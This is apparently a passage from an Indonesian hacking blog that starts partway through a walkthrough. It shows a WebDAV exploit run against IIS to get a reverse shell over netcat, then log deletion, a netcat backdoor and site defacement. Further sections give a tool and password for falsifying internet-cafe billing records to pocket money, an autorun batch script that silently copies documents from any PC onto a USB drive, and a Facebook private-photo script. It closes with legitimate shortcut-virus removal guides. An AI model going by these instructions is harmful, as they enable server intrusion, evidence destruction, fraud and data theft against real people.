Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE
Cool !!! Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe 123.123.123.123 200.200.200.200 6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.
Hack Biling Warnet
kalau saya pakai ecafepro versi 4.05
data report harian..
nah klik sofware dari saya entar muncul form login
masukan aja password : kodokijo
kalau sudah entar akan masuk kedatabase biling melalui sofware ini
data base sofware
nah edit aja didata keuangan yang disitu sesuai dengan harga net kalian,, misalkan 1 jam harganya 2500 guestkan berarti waktu tidak dibatasin oleh kita…misalnya dia habis main guest 4 jam berarti dia kena 12000, nah buka sofware aku login dan klik no tranksaksi yang tadi lalu edit edit waktu menjadi : 00:10 harga menjadi 1000…gitu…
kalau paket edit aja menjadi paket paling rendah di net kalian
misalkan kalau ditempat saya
2 jam : 5000
3 jam : 6500
4 jam : 8000
5 jam : 9500
misalnya ada yang main paket 5 jam,, tinggal edit aja deh dari database sofwarenya menjadi paket 2 jam berartikan harga keuangan 5000 jadi ada uang lebih 4500..
nih screnshoot yang data keuangannya belum saya edit
ne data yang udah saya edit
kalau anda berminat silahkan download sofwarenya di DISINI
ingat passwordnya :
password winrar : kodokijo
password sofware : kodokijo
download sofwarenya : http://www.ziddu.com/download/9828224/Masterfelix.V.1.2.rar.html
ingat bro dilakukan jangan sampe ketahuan yg punya net.. hehe, kalau ketahuan berabe deh...
Merampok Data Dengan USB FlashDrive
Pada kesempatan ini saya akan sharing menngenai merampok data di kompi dengan USB Flash Drive.. ok let’s start mulai aja yuk.
- Buka notepad pertama . .. kalau males ngetik bisa copas tulisan di bawah ini ..
@echo off
REM Name : silentxxx
REM Author : Silentxxx
Set silent=%computername% _ %random%
If not exist ”%silent%” Md “%silent%”
For%%a in (C D E F G H I J) do if exist %%a:\ (
For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\.xls’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %% b in (‘dir /a/b/s%%a:/*.txt’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:/*.docx’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
)
- Save file tersebut dengan nama terserah .bat dan save as type all files .,udah pa blon??
Sekarang coba di jalankan file dengan exstensi bat tersebut maka di samping File akan terbuat semua file yang di copy dari drive C ampai Z (kalau punya )wkwkwk. gila banyak amat..
Code di atas dapat di ubah atau di tambah sesuai dengan keinginan kalian masing-masing bisa di tambahkan kode
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\*.zip’) do(
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
maka file yang berextensi zip akan masuk ke Flash Disk kamu (wah lumayan dapat software kompresan gratis wkwkwk)
ubah sesuai extensi apa yang kamu inginkan misalnya *.pdf atau *.html
maka file terserah.bat akan berjalan sesuai dengan keinginan anda .
File tersebut bisa anda ubah ke bentuk extensi exe. .. enak atuh,, lebih mudah.. dengan software Bat_To_Exe_ConverterV1.5 kalau belum punya kakak-kakak bisa download di http://www/brothersoft.com/bat-to-exe-converter-50301.html
Cara mengubahnya adalah
- Buka software tersebut..
- Pilih yang compile
- Dan sekarang file.bat yang tadi kita buat menjadi file yang berextensi *.exe lebih enak kan ..
- Agar file tersebut maka kita harus buat file autorun
- Buka notepad ketikkan
[autorun]
Open=terserah.exe
- save as dengan nama Autorun.inf dan terserah.exe di dalam directory USB Flash Drive kamu..
- Selesai .. Akhirnya sekarang colokkan atau masukkan FD kamu atau loe atau agan di pc mana aja akan terkcopy banyak data yang kamu terima ...
Hack Foto Pribadi Di Facebook
Gak ada kerjaan? Bosen buka facebook mau ngapain? Yuk mari kita intip private profile yang di facebook.
Pertama-tama kita persiapkan script & addon mozilla dulu:
- Java Script Untuk Melihat Facebook: http://userscripts.org/scripts/source/9580.user.js
- Greasmonkey Addon Firefox: https://addons.mozilla.org/en-US/firefox/addon/748
Setelah selesai mempersiapkan:
- Install Greasmonkey Addon
- Install Java Script
- Restart Firefox
Tools hack ini akan menambahkan link di atas foto tersebut dengan link “See this Photo in its Album” di album nya. Nah tinggal di klik ajah
Cara Menghapus virus Shortcut
CARA 1 MENGHAPUS VIRUS SHORTCUT:
Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang ada di dalam USB flash disk menjadi shortcut tersebut:
1. Nonaktifkan ‘System Restore’ untuk sementara selama proses pembersihan.
2. Putuskan komputer yang akan dibersihkan dari jaringan.
3. Matikan proses virus yang aktif di memori dengan menggunakan tools ‘Ice Sword’. Setelah tools tersebut terinstal, pilih file yang mempunyai icon ‘Microsoft Visual Basic Project’ kemudian klik ‘Terminate Process’. Silahkan download tools tersebut di http://icesword.en.softonic.com/
4. Hapus registri yang sudah dibuat oleh virus dengan cara:
-. Klik menu [Start]
-. Klik [Run]
-. Ketik REGEDIT.exe, kemudian klik tombol [OK]
-. Pada aplikasi Registry Editor, telusuri key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
-. Kemudian hapus key yang mempunyai data [C:\Document and Settings\%user%].
5. Disable autoplay/autorun Windows. Copy script di bawah ini pada program notepad kemudian simpan dengan nama REPAIR.INF, install file tersebut dengan cara: Klik kanan REPAIR.INF –> INSTALL
[Version]
Signature=”$Chicago$”
Provider=Vaksincom
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255
6. Hapus File induk dan file duplikat yang dibuat oleh virus termasuk di flash disk. Untuk mempercepat proses pencarian, Anda dapat menggunakan fungsi ‘Search’. Sebelum melakukan pencarian sebaiknya tampilkan semua file yang tersembunyi dengan mengubah pada setting Folder Options.
Jangan sampai terjadi kesalahan pada saat menghapus file induk maupun file duplikat yang telah dibuat oleh virus. Lalu hapus file induk virus yang mempunyai ciri-ciri:
-. Icon ‘Microsoft Visual Basic Project’.
-. Ukuran File 128 KB (untuk varian lain akan mempunyai ukuran yang bervariasi).
-. Ekstesi file ‘.EXE’ atau ‘.SCR’.
-. Type file ‘Application’ atau ‘Screen Saver’.
Kemudian hapus File duplikat shortcut yang mempunyai ciri-ciri:
>. Icon Folder atau icon
>. Ekstensi .LNK
>. Type File ‘Shortcut’
>. Ukuran file 1 KB
Hapus juga file yang .DLL (contoh: ert.dll) dan file Autorun.inf di flash disk atau folder yang di-share. Sementara untuk menghindari virus tersebut aktif kembali, hapus file induk yang mempunyai ekstensi EXE atau SCR terlebih dahulu baru kemudian hapus file Shortcut (.LNK).
7. Tampilkan kembali folder yang telah disembunyikan oleh virus. Untuk mempercepat proses tersebut, silahkan download tools UnHide File and Folder di http://www.flashshare.com/bfu/download.html.
Setelah diinstall, pilih direktori [C:\Documents and settings] dan folder yang ada di flash disk dengan cara menggeser ke kolom yang sudah tersedia. Pada menu [Attributes] kosongkan semua pilihan yang ada, kemudian klik tombol [Change Attributes].
8. Install security patch ‘Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046′. Silakan download security patch tersebut di http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx
Seperti biasa, untuk pembersihan secara optimal dan menecegah infeksi ulang, sebaiknya install dan scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini dengan baik.
Original source: vaksin[dot]com & detikinet[dot]com
CARA 2 MENGHAPUS VIRUS SHORTCUT:
Ciri-ciri virus shortcut :
Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database.mdb di My Documents
Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive harddisk, flash disk, dan folder tanpa kecuali.
Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa file ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki tambahan huruf s alias thumbs.db) di setiap folder
Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and….lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus tersebut.
Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folder namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcut.
Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dalam kondisi normal, tidak ada proses seperti ini.
Langkah-langkah menghapus virus shortcut :
1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore segera setelah proses instalasi windows. Untuk keperluan backup dan imaging system, saya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost (baca dan dowload : Norton Ghost 15.0.0.35659 (2010) Full Serial Crack)
2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)
Bisa menggunakan Process Explorer atau misc. tool pada HijackThis (baca dan download : HijackThis 2.0.2 ).
3. Hapus file virus database.mdb di My Documents..
4. Hapus file duplikat virus..
Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows.. Pada “More advanced options”, pastikan option “Search system folders” dan “Search hidden files and folders” keduanya telah dicentang.
Search file dengan nama autorun.inf ukurannya 8 KB
Search file dengan nama Thumb.db ukurannya 8 KB
Search file dengan ekstensi .lnk.lnk ukurannya 1 KB
Hapus semua file yang ditemukan..
Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditemukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda download secara gratis. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan (lihat gambar).
5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis..
Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gambar namun file database.mdb udah saya hapus)
regedit_run
Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari serangan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berikut:
1. Setelah proses instalasi windows, segera matikan system restore.
2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Professional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program MagicTweak selain berfungsi menon-aktifkan autorn dapat juga digunakan untuk mencegah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alias notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat membantu jika memang secara tidak sengaja kita mengaktifkan atau mengeksekusi autorun.inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk).
3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut.
4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh banyak orang, sehingga settingan komputer tidak akan berubah-ubah.
5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seperti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini, berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka flashdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun dan file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supaya tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan cara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicTweak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah diaktifkan.
Nah, itu mungkin sedikit tips cara menghapus virus shortcut dan smoga komputer kamu setelah hapus virus shortcut jadi bebas deh dari virus shortcut